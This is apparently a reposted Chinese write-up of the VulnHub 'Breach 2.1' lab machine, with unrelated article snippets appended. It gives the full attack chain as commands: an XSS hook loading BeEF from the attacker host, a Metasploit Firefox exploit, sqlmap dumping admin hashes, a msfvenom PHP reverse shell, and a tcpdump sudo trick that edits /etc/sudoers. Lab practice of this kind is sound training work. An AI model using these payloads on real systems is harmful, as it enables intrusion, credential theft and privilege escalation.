vulnhub靶机:Breach 2.1详细过程

下载

下载地址:https://www.vulnhub.com/entry/breach-21,159/

修改网络模式

根据靶机的描述得知该靶机适用于静态ip,即192.168.110.151;配置虚拟机的虚拟网络编辑器的仅主机模式,将其子网IP配置在110网段,并将攻击机kali和靶机也设置为仅主机模式

端口扫描

nmap -A -p- 192.168.110.151

发现ssh服务开启,尝试ssh连接

ssh 192.168.110.151 -p 65535

得到一个用户名和密码

Peter
inthesource

使用ssh远程连接Peter用户,却发现连接断开

ssh peter@192.168.110.151 -p 65535

重新扫描靶机开放的端口,发现又开放了一个80端口

nmap -sV -p- 192.168.110.151

访问网站

BEEF提示或许可以使用 beef-xss 这个xss工具

目录扫描

使用dirsearch对其目录扫描 发现两个目录 /blog /images

python3 dirsearch.py -u "192.168.110.151" -x 403

访问 /blog

访问 /image

get shell

回到刚才的页面,通过验证注册框存在xss

<script>alert(111)</script>

这里需要用到之前提到的工具 beef-xss 来 getshell

如果没有,在kali上安装该工具

sudo apt install beef-xss
beef-xss

需要设置一个密码

默认用户名 beef 完成登录

根据提示信息 我们注册框输入的xss语句如下,将127.0.0.1改成kali的ip地址

<script src="http://127.0.0.1:3000/hook.js"></script>
<script src="http://192.168.110.128:3000/hook.js"></script>

提交成功之后访问 http://192.168.110.151/blog/members.html 即可触发漏洞

访问:http://192.168.110.128:3000/ui/panel,可以看到Kali和靶机都已上线,点击Members后kali会上线,靶机需要过一会才会上线

可以看到该网站的火狐版本很低 Firefox/15.0 可以利用利用版本漏洞

查找存在的漏洞

searchsploit firefox 15

发现了符合的漏洞,并且可以msf利用

msfconsole
search firefox 15
use 12

show options
set uripath 123456(beef-xss设置密码)
set lhost 192.168.110.128
run

给出一个url,将给出中的url在浏览器中设置重定向访问

可以在msf中看到会话已经建立 ,速度较慢,需等待一些时间

因为通过 firefox_proto_crmfrequest 得到的shell不稳定,因此我们需要shell持久化

search post shell to meterpreter
use post/multi/manage/shell_to_meterpreter
options
set lhost 192.168.110.128

这时要再次点击 Execute按钮

根据新建立的 session Id 来设置 shell_to_meterpreter 的 options 中 session值

一旦建立session 立刻输入run 执行命令

输入sessions检查是否成功 直到看到meterpreter的session建立

获取shell

sessions -i 6
shell
whoami

cat /etc/passwd 发现了两个用户 milton blumbergh

sudo -l 将两个用户更新至user.list

milton用户提权

因为之前Peter用户无法ssh连接,查看相关配置

ls .ssh -al
ls /etc | grep ssh
ls /etc/ssh -al

sshd_config 是客户端的ssh配置文件,在文件末尾发现,ssh 连接过程会强制执行名为 startme 的程序,推测其与 ssh 无法成功连接有关

cat /etc/ssh/sshd_config

查看 startme 内容,其内容是启动了apache服务

cat /usr/bin/startme

覆盖 .bashrc 文件后,可以在ssh连接后可以保持shell

echo 'exec /bin/bash' > .bashrc

查看网站目录,看到html2目录

ls /var/www -al

在其目录中存在 oscommerec

ls /var/www/html2

html2 可能是一个新的web站点

查看靶机的网络信息

netstat -anlpt

发现一个2323端口

尝试使用telnet连接 显示了连接过程中的全部信息

telnet 127.0.0.1 2323

用google查询 发现这个地点位于Houston,作为密码输入

用户名的话也就是之前/etc/passwd文件中的用户名

经尝试用户名为 milton

我们需要回答一个问题:这个订书机是谁的

我们需要在目录下寻找关键词stapler

cd /usr
grep -rno stapler

发现一个 cd.py 文件 查看其内容

答案是 mine

再次使用telnet连接2323端口

登录成功 实现milton用户提权

blumbergh用户提权

再次查看网络信息,出现了8888端口

netstat -tln

尝试访问,点击 oscommerce

对其目录扫描 发现了一个登录页面

python3 dirsearch.py -u "http://192.168.110.151:8888/oscommerce/"

在配置文件中发现,mysql数据库的root用户并没有设置密码

使用sqlmap进行读取数据

sqlmap -u http://192.168.110.151/blog/index.php?search=1 --batch
sqlmap -u http://192.168.110.151/blog/index.php?search=1 --dbs --batch
sqlmap -u http://192.168.110.151/blog/index.php?search=1 -D oscommerce --tables --batch
sqlmap -u http://192.168.110.151/blog/index.php?search=1 -D oscommerce -T osc_administrators --columns --batch
sqlmap -u http://192.168.110.151/blog/index.php?search=1 -D oscommerce -T osc_administrators -C user_name,user_password --dump --batch

得到管理员密码的哈希值,解密

四处翻翻发现一个上传文件的位置,上传文件

在 include目录下面找到了一个可写的目录

使用 MSF 生成反弹shell木马,并上传到靶机中

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.110.128 LPORT=9999 -f raw -o shell.php

MSF 设置监听

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.110.128
set lport 9999
run

获取交互式shell,发现此时用户为blumbergh,依旧是低权限

shell
python -c "import pty;pty.spawn('/bin/bash')"
sudo -l

切换到 tmp 目录,构造1.sh 脚本文件以实现提权,然后执行GTOFbins中给出的 sudo 命令,实现脚本利用

cd /tmp
echo 'echo "blumbergh ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /tmp/test && chmod +x /tmp/test
sudo /usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/test -Z root
sudo su

提权成功

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/427202.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

C++初阶学习第六弹------标准库中的string类

目录 一.标准库中的string类 二.string的常用接口函数 2.1string类对象的构造 2.2 string的容量操作 2.3 string类的访问与遍历 2.4 string类对象的修改 2.5 string类常用的非成员函数 三、总结 一.标准库中的string类 可以简单理解成把string类理解为变长的字符数组&#x…

2024.9.13 Python与图像处理新国大EE5731课程大作业,索贝尔算子计算边缘,高斯核模糊边缘,Haar小波计算边缘

1.编写一个图像二维卷积程序。它应该能够处理任何灰度输入图像&#xff0c;并使用以下内核进行操作&#xff1a; %matplotlib inline import numpy as np import matplotlib.pyplot as plt from scipy import linalg import random as rm import math import cv2# import and …

linux网络编程3

24.9.19学习目录 一.UDP&#xff08;续&#xff09;1.UDP编程2.注意点2.TFTPTFTP通信过程TFTP协议分析 一.UDP&#xff08;续&#xff09; 1.UDP编程 &#xff08;1&#xff09;sendto函数发送数据 向to结构体指针中指定的ip&#xff0c;发送UDP数据&#xff1b; 通过to和ad…

时间复杂度的常用符号+渐进时间复杂度分析

时间复杂度的常用符号 Θ \Theta Θ 如果 f ( n ) Θ ( g ( n ) ) f(n)\Theta(g(n)) f(n)Θ(g(n))&#xff0c;则 f ( n ) f(n) f(n) 与 g ( n ) g(n) g(n) 同阶。&#xff08;阶是指 f ( n ) f(n) f(n) 的指数&#xff0c;比如 n 2 n^2 n2 高于 n n n&#xff09; O O …

MacOS安装homebrew,jEnv,多版本JDK

1 安装homebrew homebrew官网 根据官网提示&#xff0c;运行安装命令 /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"安装后&#xff0c;bash会提示执行两条命令 (echo; echo eval "$(/opt/homebrew/b…

海康威视摄像机和录像机的监控与回放

文章目录 海康威视摄像机和录像机的监控与回放1、海康威视监控设备简介1.1、摄像机二次开发1.1.1&#xff1a;协议选择 1.2&#xff1a;web集成1.2&#xff1a;标准协议对接1.2.1&#xff1a;ffmpeg软件转流1.2.2&#xff1a;开源监控软件shinobi1.2.3&#xff1a;使用nginx的R…

黑神话悟空mac可以玩吗

黑神话悟空mac上能不能玩对于苹果玩家来说很重要&#xff0c;那么黑神话悟空mac可以玩吗&#xff1f;目前是玩不了了&#xff0c;没有针对ios系统的版本&#xff0c;只能之后在云平台上找找了&#xff0c;大家可以再观望下看看。 黑神话悟空mac可以玩吗 ‌使用CrossOver‌&…

【海康威视面经】

海康威视面经 Java基础java常用集合 及其优缺点ArrayListVectorLinkedList Jvm调优监控发现问题工具分析问题 &#xff1a;性能调优GC频繁 出现内存泄漏 内存溢出CPU飙升 Synchronized和Volatile的比较反射线程池和new thread利弊高并发 集群 分布式 负载均衡 MySQL调优基础优化…

neo4j安装启动教程+对应的jdk配置

参考这位博主的视频教程&#xff1a;neo4j社区windows版下载 一、官网下载neo4j的安装包 &#xff08;1&#xff09;官网下载页面 &#xff08;2&#xff09;上一步 【download】之后&#xff0c;会自动下载&#xff0c;如果没有&#xff0c;点击【here】 这里可以看到一行字…

Gradio 自定义组件

如何使用 Gradio 自定义组件&#xff0c;Gradio 前端使用 Svelte&#xff0c;后端使用的 Python。如何自定义一个组件呢&#xff1f;Gadio 提供了类似于脚手架的命令&#xff0c;可以生成需要开发组件的前后和后端代码。 创建组件 运行如下命令&#xff0c;gradio 会自动生成…

[2025]基于微信小程序慢性呼吸系统疾病的健康管理(源码+文档+解答)

博主介绍&#xff1a; ✌我是阿龙&#xff0c;一名专注于Java技术领域的程序员&#xff0c;全网拥有10W粉丝。作为CSDN特邀作者、博客专家、新星计划导师&#xff0c;我在计算机毕业设计开发方面积累了丰富的经验。同时&#xff0c;我也是掘金、华为云、阿里云、InfoQ等平台…

开放标准如何破解企业数字化与可持续发展的困境:The Open Group引领生态系统架构创新

应对数字化与可持续发展的双重挑战&#xff0c;开放标准是关键 在当今快速变化的商业环境中&#xff0c;企业不仅需要通过数字化转型提升竞争力&#xff0c;还面临日益严格的可持续发展要求。开放标准正在成为企业破解这一双重挑战的核心工具。The Open Group 2024生态系统架构…

【MySQL】了解并操作MySQL的缓存配置与信息

目录 一、查看缓存配置 二、查看缓存信息 查询MySQL的缓存相关信息&#xff0c;一般我们用两个命令&#xff1a; show variables like %query_cache%; show status like %qcache%; 一、查看缓存配置 查看缓存配置的相关的系统变量变量&#xff0c;返回给我们服务器缓存的配置…

【SQL】百题计划:SQL内置函数“LENGTH“的使用

【SQL】百题计划-20240912 方法一&#xff1a; Select tweet_id from Tweets where LENGTH(content) > 15;– 方法二&#xff1a; Select tweet_id from Tweets where CHAR_LENGTH(content)> 15;

WordPress建站钩子函数及使用

目录 前言&#xff1a; 使用场景&#xff1a; 一、常用的wordpress钩子&#xff08;动作钩子、过滤器钩子&#xff09; 1、动作钩子&#xff08;Action Hooks&#xff09; 2、过滤器钩子&#xff08;Filter Hooks&#xff09; 二、常用钩子示例 1、添加自定义 CSS 和 JS…

HTB-Vaccine(suid提权、sqlmap、john2zip)

前言 各位师傅大家好&#xff0c;我是qmx_07&#xff0c;今天来为大家讲解Vaccine靶机 渗透过程 信息搜集 服务器开放了 21FTP服务、22SSH服务、80HTTP服务 通过匿名登录FTP服务器 通过匿名登录到服务器&#xff0c;发现backup.zip文件&#xff0c;可能存在账号密码 发现b…

硬件工程师笔试面试——滤波器

目录 12、滤波器 12.1 基础 滤波器原理图 滤波器实物图 12.1.1 概念 12.1.2 滤波器的分类 12.1.3 滤波器的工作原理 12.1.4 滤波器的应用 12.1.5 滤波器设计的关键参数 12.2 相关问题 12.2.1 不同类型的滤波器在实际应用中的具体作用是什么? 12.2.2 如何设计一个简…

ABAP-Logger ABAP 日志记录与任何其他语言一样轻松

ABAP-Logger ABAP 日志记录与任何其他语言一样轻松 ABAP Logger SAP Logging as painless as any other language. ABAP Version: 702 or higher See the mission statement Features Record message in Application Log(BC-SRV-BAL)Display message Installation Insta…

记忆化搜索

目录 引言&#xff1a; 1. 什么是记忆化搜索&#xff1f; 2. 如何实现记忆化搜索&#xff1f; 一、斐波那契数 1. 题目链接&#xff1a;509. 斐波那契数 2. 题目描述&#xff1a; 3. 解法&#xff08;暴搜 -> 记忆化搜索 -> 动态规划&#xff09;&#xff1a; &am…

【楚怡杯】职业院校技能大赛 “云计算应用” 赛项样题六

某企业根据自身业务需求&#xff0c;实施数字化转型&#xff0c;规划和建设数字化平台&#xff0c;平台聚焦“DevOps开发运维一体化”和“数据驱动产品开发”&#xff0c;拟采用开源OpenStack搭建企业内部私有云平台&#xff0c;开源Kubernetes搭建云原生服务平台&#xff0c;选…